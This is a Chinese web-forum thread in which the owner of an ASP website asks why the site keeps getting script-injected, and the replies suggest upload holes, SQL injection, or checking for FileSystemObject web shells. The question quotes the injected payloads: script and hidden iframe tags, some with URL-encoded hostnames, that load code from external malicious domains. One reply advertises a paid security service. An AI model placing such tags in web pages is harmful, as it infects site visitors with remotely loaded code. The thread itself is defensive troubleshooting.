請問網站被掛馬的原因?


我的一個asp網站被掛馬了,請問這是我的asp程序的漏洞引起的,還是服務器的漏洞引起的,或者是服務器本身有病毒引起的?
我覺得是服務器的總是,但是虛擬機提供商說是我的程序漏洞引起的。我也不知道哪兒有什么漏洞。
網站除管理員外,其它人員沒有上傳功能。整個網站基本上就是以閱讀內容為主,只有一個留言系統是對外開放的。
每次清除了,過不多久,又被掛上了。掛的馬很多,如下:

<script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://%7A%73%68%61%63%6B%2E%63%6E></script><script src=http://qqhaomm.cn></script><script src=http://yyhaomm.cn></script><script src=http://%61%76%65%31%2E%63%6E></script><iframe src=http://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script><iframe src=http://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe><script src=http://%61%76%65%32%2E%63%6E></script>

<script src=http://%7a%73%68%61%63%6b></script><script src=http://%7a%73%68%61%63%6b></script><script src=http://qqhaomm></script><script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script><script src=http://yyhaomm></script><script src=http://%61%76%65%31></script><script src=http://%61%76%65%32></script><script src=http://%61%76%65%32%2E%63%6E></script>

<script language="javascript" src="http://conn.ch.ma/click.js?id=15&evx=52591"></script>

13 个解决方案

#1


一般是上傳漏洞

可能是你哪個地方對權限的檢測不夠好,也可能真是服務商的問題

#2


服務器設置的可能,最常見的為上傳程序有漏洞

#3


哦,可是我的上傳程序只有管理員才能使用啊。

#4


難道這也是一種幸運.

#5


存在SQL注入漏洞

#6


另外可能是服務器被攻擊~

#7


這真是個麻煩事啊,程序不好檢查漏洞啊,一大堆。
各位有沒有什么這方面的經驗?

#8


如果有較好能力,把網站遷移到Linux環境下,可能稍微好些。

#9


最簡單的程序查找漏洞的方法:
檢查服務器上程序文件的生成日期,如與你上傳時的日期不符,多半是被人改了.到這些文件中找找FSO,一般都是通過不設置權限的FSO,上傳另一個文件來達到控制你網站的目的.

#10


查查哪個文件里有這樣的話:
CreateObject("Scripting.FileSystemObject")
如果不是你寫的,那就是問題程序了.

#11


這問題很嚴重,很明顯是網站存在漏洞而被攻擊了,若需要安全技術服務請聯系EMAIL & MSN:yisheng@hotmail.com, 7X24 為您的網站保駕護航。

#12


該回復於2010-06-13 15:45:41被版主刪除

#13


該回復於2010-06-13 15:45:36被版主刪除

注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2021 ITdaan.com